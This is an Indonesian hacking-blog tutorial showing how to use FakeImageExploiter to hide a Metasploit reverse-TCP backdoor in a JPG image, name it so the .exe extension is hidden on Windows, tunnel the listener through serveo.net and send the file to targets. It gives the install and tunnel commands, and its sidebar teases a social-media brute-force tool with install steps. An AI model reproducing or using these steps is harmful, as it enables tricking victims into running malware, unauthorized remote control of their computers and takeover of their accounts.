Skip to main content

FakeImageExploiter : Menyisipkan Backdoor Metasploit ke Dalam Gambar

Image
By
squadcyber - Hai guys, kali ini gw akan membawakan tutorial bagaimana cara nya menyisipkan backdoor metasploit untuk #windows ke dalam file image dengan menggunakan FakeImageExploiter, walaupun nanti output backdoor nya menjadi file.jpg.exe namun jika di #windows format exe nya menjadi tidak terlihat.

Fake Image Exploiter ini juga menggunakan metasploit untuk membuat dan listen backdoor nya, maka dari itu jika kalian tidak menggunakan distro #linux pentest yang tidak secara default terinstall metasploit, maka di wajib kan untuk menginstall nya terlebih dahulu.

Requirement

  • mingw32
  • Wine
  • Xterm
  • Zenity
  • Wine Program Files

Cara Install dan Setting FakeImageExploiter

$ git clone https://github.com/r00t-3xp10it/FakeImageExploiter
$ cd FakeImageExploiter
$ chmod 777 FakeImageExploiter.sh settings
$ leafpad settings

Ubah isi settings sesuai gambar di bawah ini.






lalu save dan tutup file settings tersebut, dan jalankan FakeImageExploiter dengan mengetikkan.

$ ./FakeImageExploiter.sh

maka akan muncul seperti di gambar di bawah ini, 


dan muncul notifikasi Execute Framework maka klik OK.


lalu pilih payload yang akan kalian buat, kali ini gw memilih reverse tcp.



lalu pilih gambar yang akan disisipi backdoor, pilih gambar yang berformay jpg, atau jika kalian ingin mengganti nya kalian bisa rubah di settings tadi.


lalu pilih icon replacement.

dan beri nama pada payload tersebut.


maka payload akan terbuat, dan otomatis terbuka metasploit nya untuk listen payload tersebut.


buka terminal baru untuk menjalankan serveo agar bisa berjalan di target yang tidak dalam 1 jaringan saja.

$ ssh -R 3434:localhost:4444 serveo.net

3434 bisa kalian ganti sesuai dengan keinginan kalian.


lalu buka folder FakeImageExploier/output dan sebarkan payload yang telah kalian buat ke target kalian.


Update


Jika korban membuka file image yang telah kita sisipi backdoor tadi, maka metasploit nya akan berjalan dengan sendiri nya, dan kita akan tersambung dengan #komputer korban, di sini gw memakai #Virtual box sebagai contoh nya di karenakan tidak ada #pc ke 2 :v.



dan untuk mengetahui apa saja yang bisa kita lakukan cukup dengan mengetikkan "help" tanpa tanda petik.



Demikian tutorial Menyisipkan Backdoor Metasploit ke Dalam Gambar.
Semoga bermanfaat.
Labels:

Comments

  1. Ebleng7 November 2018 at 05:53

    Gan request tutorial cara FakeImage di termux

    ReplyDelete
  2. Muhammad Fathur1 May 2019 at 22:44

    bro, gimana sih ini mingw32 gaada di linux gw, pc gw 64bit

    ReplyDelete
  3. Ha2 May 2019 at 04:27

    Gan, mingw32 nya ga bisa di install ,, ada juga mingw64 .. ada solusi ngga gan??

    ReplyDelete

Post a Comment

Popular posts from this blog

Mahasiswa UBSI Serahkan Aplikasi Web 'SISTEM INFORMASI PENGELOLAAN ZIS' kepada LAZISMU Unit Wage

By
  J akarta, 10 Oktober 2025 - Ismail Hasan Basri , mahasiswa dari Universitas Bina Sarana Informatika (UBSI) , berhasil menyelesaikan proyek tugas akhirnya berupa aplikasi inovatif. Aplikasi yang diberi nama "SISTEM INFORMASI PENGELOLAAN ZIS BERBASIS WEB" ini diserahkan secara resmi kepada LAZISMU (Lembaga Amil Zakat, Infak, dan Sedekah Muhammadiyah) Unit Wage sebagai produk dari skripsinya. Sistem berbasis web ini dirancang untuk memodernisasi dan meningkatkan efisiensi seluruh proses pengelolaan Zakat, Infak, dan Sedekah (ZIS) di LAZISMU Unit Wage. Dengan aplikasi ini, LAZISMU diharapkan dapat melakukan pencatatan, pelaporan, serta transparansi data penerimaan dan penyaluran dana ZIS secara lebih cepat, akurat, dan mudah diakses. Ismail Hasan Basri , mahasiswa Program Studi Sistem Informasi UBSI, menyatakan, "Pengelolaan ZIS yang masih dilakukan secara manual memiliki risiko kesalahan data dan kurang efisien. Aplikasi ini hadir untuk memberikan solusi digital, memas...
Post a Comment
Read more

Social Media Bruteforce Tool (Facebook, Gmail, Instagram, Twitter)

By
squadcyber - SocialBox adalah tool yang berfungsi sebagai alat untuk Bruteforce beberapa sosial media seperti Facebook, Gmail, Instagram dan Twitter. Tested On Backbox Linux Ubuntu Kali Linux Cara Install dan Menjalankan SocialBox $ sudo apt-get install git $ sudo git clone https://github.com/TunisianEagles/SocialBox.git $ cd SocialBox $ chmod +x SocialBox.sh $ chmod +x install-sb.sh $ ./install-sb.sh $ ./SocialBox.sh  Contact Contact - Belahsan Ouerghi cara bruteforce wifi cara bruteforce instagram cara bruteforce router cara brute force wordpress cara brute force gmail cara brute force cpanel cara brute force di android cara brute force cara brute force akun gmail cara brute force akun fb cara bruteforce facebook android cara brute force attack cara brute force attack facebook cara brute force android cara hack facebook brute force android cara brute force biss key cara belajar brute force cara buat brute force cara brute force dengan cmd cara brute ...
Post a Comment
Read more

Cara Mendapatkan Akses Root di Termux Tanpa Root

By
squadcyber - Di Termux kita dapat melakukan hal apa saja yang kita inginkan untuk melakukan kegiatan hacking, atau sebatas programming, namun adakala nya kita tidak leluasa karena tool yang kita jalankan membutuhkan akses Root sedangkan HandPhone yang kita gunakan untuk menjalankan Termux masih perawan atau belum di root, dengan alasan Me-Root HP dapat menghilangkan garansi HP tersebut, atau kalian yang tidak bisa nge-root HP nya. Maka dari itu, kita mencari alternatif lain agar termux kita dapat menjalankan tool yang membutuhkan hak akses root pada HP kita dengan menginstal Termux Fakeroot di termux kita. Termux Fakeroot bekerja untuk mengelabui system android kita agar system tersebut mendeteksi android kita telah memiliki akses root, padahal tidak. Dengan Fakeroot kita dapat menjalankan tool yang semula nya membutuhkan akses root di Hp kita tanpa susah-susah untuk me-root Hp kita. Tapi Fakeroot ini hanya bekerja sebatas pada termux saja, tidak untuk hal yang lain sepe...
Post a Comment
Read more